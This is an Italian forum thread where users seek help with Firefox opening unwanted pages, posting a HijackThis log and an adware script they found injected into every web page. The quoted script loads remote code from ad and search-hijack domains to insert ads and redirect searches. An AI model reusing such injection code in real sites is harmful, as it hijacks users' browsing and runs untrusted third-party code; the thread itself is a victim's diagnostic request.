View Full Version : [WINXP] Pagine Internet si aprono da sole su Firefox


anx721
18-11-2012, 09:59
Ciao,

da alcuni giorni mi succede che mentre ho firefox aperto (impostato come browser predefinito) si aprono nuove finestre che vanno su siti diversi. Ho provato a fare un ripristino di sistema ma non ha risolto il problema, AVG e spyboot non rilevano nulla. Allego di seguito il log di HijackThis.
Grazie a chi puņ aiutarmi.


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21.28.46, on 02/12/2012
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\drivers\crauto.exe
C:\WINDOWS\system32\CTsvcCDA.EXE
C:\WINDOWS\system32\FsUsbExService.Exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\drivers\IMountSRV.exe
C:\Programmi\Stonesoft\StoneGate IPsec VPN\bin\sgvpn.exe
C:\Programmi\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\AVG\AVG8\avgemc.exe
C:\Programmi\AVG\AVG8\avgcsrvx.exe
C:\Programmi\Stonesoft\StoneGate IPsec VPN\bin\sgpm.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Programmi\Google\Update\1.3.21.123\GoogleCrashHandler.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\Mixer.exe
C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe
C:\Programmi\Creative\MediaSource\Surround Mixer\CTSysVol.exe
C:\Programmi\Creative\Shared Files\Module Loader\DLLML.exe
C:\WINDOWS\CTHELPER.EXE
C:\Programmi\ATI Technologies\ATI.ACE\cli.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Programmi\NETGEAR\WG111v3\WG111v3.exe
C:\Documents and Settings\Workstation\Impostazioni locali\Dati applicazioni\YouTube\Uploader\youtubeuploader.exe
C:\Programmi\ATI Technologies\ATI.ACE\cli.exe
C:\Programmi\ATI Technologies\ATI.ACE\cli.exe
C:\Programmi\Mozilla Firefox\firefox.exe
C:\Programmi\Mozilla Firefox\plugin-container.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Programmi\Stonesoft\StoneGate IPsec VPN\bin\sggui.exe
C:\Programmi\Stonesoft\StoneGate IPsec VPN\bin\sgcrypto.exe
C:\WINDOWS\system32\mstsc.exe
C:\WINDOWS\System32\svchost.exe
X:\E\Istallazioni\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: btorbit.com - {000123B4-9B42-4900-B3F7-F4B073EFC214} - C:\Programmi\Orbitdownloader\orbitcth.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\File comuni\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Programmi\AVG\AVG8\avgssie.dll (file missing)
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Programmi\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Guida per l'accesso a Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programmi\File comuni\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Gears Helper - {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} - C:\Programmi\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [Encrypted Disk Auto Mount] rundll32.exe edshell.dll,MountAll
O4 - HKLM\..\Run: [WinPatrol] C:\PROGRA~1\BILLPS~1\WINPAT~1\winpatrol.exe
O4 - HKLM\..\Run: [CTSysVol] C:\Programmi\Creative\MediaSource\Surround Mixer\CTSysVol.exe /r
O4 - HKLM\..\Run: [AudioDrvEmulator] "C:\Programmi\Creative\Shared Files\Module Loader\DLLML.exe" -1 AudioDrvEmulator "C:\Programmi\Creative\Shared Files\Module Loader\Audio Emulator\AudDrvEm.dll"
O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [ATICCC] "C:\Programmi\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Creative MediaSource Go] C:\Programmi\Creative\MediaSource\Go\CTCMSGo.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Programmi\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVIZIO LOCALE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVIZIO DI RETE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: YouTube Uploader.lnk = C:\Documents and Settings\Workstation\Impostazioni locali\Dati applicazioni\YouTube\Uploader\youtubeuploader.exe
O4 - Global Startup: NETGEAR WG111v3 Smart Wizard.lnk = C:\Programmi\NETGEAR\WG111v3\WG111v3.exe
O8 - Extra context menu item: &Clean Traces - C:\Programmi\DAP\Privacy Package\dapcleanerie.htm
O8 - Extra context menu item: &Download by Orbit - res://C:\Programmi\Orbitdownloader\orbitmxt.dll/201
O8 - Extra context menu item: &Download with &DAP - C:\Programmi\DAP\dapextie.htm
O8 - Extra context menu item: &Grab video by Orbit - res://C:\Programmi\Orbitdownloader\orbitmxt.dll/204
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: Do&wnload selected by Orbit - res://C:\Programmi\Orbitdownloader\orbitmxt.dll/203
O8 - Extra context menu item: Down&load all by Orbit - res://C:\Programmi\Orbitdownloader\orbitmxt.dll/202
O8 - Extra context menu item: Download &all with DAP - C:\Programmi\DAP\dapextie2.htm
O8 - Extra context menu item: Download Links As... - file://C:\WINDOWS\system32\page.htm
O8 - Extra context menu item: Download Target(s) As... - file://C:\WINDOWS\system32\link.htm
O8 - Extra context menu item: E&sporta in Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Salva oggetto con NetXfer - C:\Programmi\Xi\NetXfer\NXAddLink.html
O8 - Extra context menu item: Salva tutti gli oggetti con NetXfer - C:\Programmi\Xi\NetXfer\NXAddList.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_04\bin\npjpi150_04.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_04\bin\npjpi150_04.dll
O9 - Extra button: (no name) - {09C04DA7-5B76-4EBC-BBEE-B25EAC5965F5} - C:\Programmi\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll
O9 - Extra 'Tools' menuitem: &Impostazioni di Google Gears - {09C04DA7-5B76-4EBC-BBEE-B25EAC5965F5} - C:\Programmi\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programmi\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programmi\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Programmi\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Programmi\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmi\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmi\Messenger\msmsgs.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FILECO~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: avgrsstarter - avgrsstx.dll (file missing)
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Adobe LM Service - Unknown owner - C:\Programmi\File comuni\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Free8 E-mail Scanner (avg8emc) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgemc.exe
O23 - Service: AVG Free8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: crauto - Unknown owner - C:\WINDOWS\system32\drivers\crauto.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\system32\CTsvcCDA.EXE
O23 - Service: FsUsbExService - Teruten - C:\WINDOWS\system32\FsUsbExService.Exe
O23 - Service: GEARSecurity - GEAR Software - C:\WINDOWS\System32\GEARSec.exe
O23 - Service: Google Update Service (gupdate1c954e6f56dc896) (gupdate1c954e6f56dc896) - Google Inc. - C:\Programmi\Google\Update\GoogleUpdate.exe
O23 - Service: Servizio Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Programmi\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: IMountSRV - Unknown owner - C:\WINDOWS\system32\drivers\IMountSRV.exe
O23 - Service: Network WanMiniport First Position - Unknown owner - C:\Programmi\Telecom Italia\WanMiniport1st\srvany.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PMounter - Unknown owner - C:\Programmi\Paragon HDM\Ext2\PMounter.exe
O23 - Service: StoneGate IPsec VPN (sgipsecvpn) - Stonesoft Corporation - C:\Programmi\Stonesoft\StoneGate IPsec VPN\bin\sgvpn.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Programmi\Sygate\SPF\smc.exe
O23 - Service: V2i Protector - PowerQuest Corporation - C:\Programmi\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe

--
End of file - 10640 bytes

anx721
02-12-2012, 21:31
Ciao,

nessuno mi sa dare una mano? Da ieri riscontro altri problemi con i browser, ad come se non riuscissero ad a far funzionare i cookie, oppure le pagine sembrano in caricamento continuo.

anx721
02-12-2012, 21:52
Ho appena scoperto, vedendo il codice delle pagine caricate dal browser, sia IE che firefox, che a tutte le pagine viene appeso il seguente script:


<script>
var id=907789591;
var aff=30421;
var sid=3;
function INCL_isIFramed()
{
return (top !== self);
}
function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search\.kalloutsearch\d\.com/i.test(h) == true ||
/search\.adbar\d\.com/i.test(h) == true ||
h.indexOf('search.runclips.com') != -1 ||
h.indexOf('search.searchnowdirect.com') != -1);
}

function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
(document.head||document.documentElement).appendChild(script);
}
if (!INCL_isIFramed() && !INCL_checkinternals())
{
if (!INCL_checkdml()) {
var INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.cpchero.biz',
sttcdm: 'static.cpchero.biz',
inlsrhdm: 'sonicsearchonline.biz' };
INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch2.min.js');
INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36');
}
INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd :
4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url
:
'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords='
, script_base : 'https://hostmyjs.biz/scripts/adbar' };
INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js');
}
</script>

mastone
16-12-2012, 09:46
credo sia simile a ciņ che parlano su questo sito
http://www.chiccheinformatiche.com/popup-httpib-adnxs-com-come-eliminarlo-e-un-virus-o-spam/

lucasheva
12-08-2013, 15:56
Ciao,

da alcuni giorni mi succede che mentre ho firefox aperto (impostato come browser predefinito) si aprono nuove finestre che vanno su siti diversi. Ho provato a fare un ripristino di sistema ma non ha risolto il problema, AVG e spyboot non rilevano nulla. Allego di seguito il log di HijackThis.
Grazie a chi puņ aiutarmi.

stesso problema con firefox..
ho usato adwrcleaner ma niente
ho disabilitato in avvio alcuni processi che risultavano da un a precedente scansione di hijackthis "LiveUpSc", "Ssro Service" e "Ssupd Service"
di seguito il log di hijackthis

lucasheva
12-08-2013, 16:27
allego anche log combofix